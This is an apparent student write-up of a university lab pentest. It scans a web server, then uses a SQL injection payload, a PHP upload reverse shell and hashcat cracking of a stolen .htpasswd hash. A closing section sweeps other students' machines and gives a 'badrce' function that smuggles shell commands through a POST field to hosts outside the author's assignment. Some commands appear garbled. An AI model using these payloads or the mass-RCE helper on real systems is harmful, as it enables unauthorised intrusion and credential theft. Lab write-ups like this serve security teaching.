Simple web server pentest
During my last year in uni, we took a class on security. One of the assessment was to take control of a machine - some kind of KOTH minus the competition. We worked in pair and every pair had its own machine to take over.
Here is a succint breakdown on how I achieved that plus a little bonus at the end.
I always start by scanning the machine to see what's up.
Using nmap: nmap -Pn 192.168.xxx.xxx
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp closed http
443/tcp closed https
5432/tcp closed postgresql
8080/tcp open http Apache httpd 2.2.16 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So there is a webserver! Let's crack it open. we use gobuster to figure out where are the endpoints:
gobuster -u http://192.168.xxx.xxx:8080 -w /usr/share/dirbuster-basic.txt
We poked around a bit and stumbled upon a very promising url...
Manual SQL injection
Since we figured out we could inject some SQL on /blog.php?id<sql>, we can start messing with it.
Figuring out MYSQL version
/blog.php?id=0 and 1=2 union <your request> --
We craft the request to match the number of columns in the previous request:
select 1, 1, @@version as 'foo', 1, 1, 1; --
10.2.11-MariaDB-10.2.11 maria~jessie
After having some fun with sql injection, we went further and discovered we could upload files. After realizing we could trick the server into thinking an image was in fact a php file, and figuring out where the file was stored, we were all set to reverse shell onto this server.
Opening a reverse shell
-
Start netcat on your computer:
netcat -nvlp PORT -
Start your reverseshell.php on your victime by acceding to
/upload/reverseshell.php -
Stabilize the shell
-
SHELL=/bin/bash script -q /dev/null -
export TERM=xterm
-
Bruteforcing .htaccess password
Using our reverse shell:
-
cat /var/www/admin/.htpasswd
admin:$apr1$NPiDXOoh$H9hRCiWDVKaikHYjxxxx
We then run hashcat
hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
Going further
There are other students doing the same assignement. Let's figure out what are the IP of their machines:
i=0; while [ $i -le 254 ]; do echo "192.168.237.$i"; ping 192.168.237.$i -c 1 -W 0.5 | grep "1 received"; ((i )); done;
Some of theses machines are not related to the assignement. Let's skip them.
Finding machines with /upload:
i=132;
rm /tmp/ip.txt;
while [ $i -le 158 ];
do
curl -s 192.168.237.$i:8080/upload \
--connect-timeout 1 | grep 301 > /dev/null AND echo "192.168.237.$i" >> /tmp/ip.txt;
((i ));
done;
cat /tmp/ip.txt;
echo "$(cat /tmp/ip.txt | wc -l)/27";
Getting a quick rce on these machines:
function badrce() {
ip="$1";
cmd="$2";
curl -s "http://$ip:8080/tools.php" -X POST \
-H 'Referer: http://192.168.237.152:8080/tools.php' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Connection: keep-alive' \
--data-raw "ip=192.168.237.100 >/dev/null;$cmdAMPsubmit=Scan!" > /tmp/file.html;
sed -Ez 's/.*<pre>(.*)<\/pre>.*/\1/' /tmp/file.html
}
# usage badrce "ip" "command"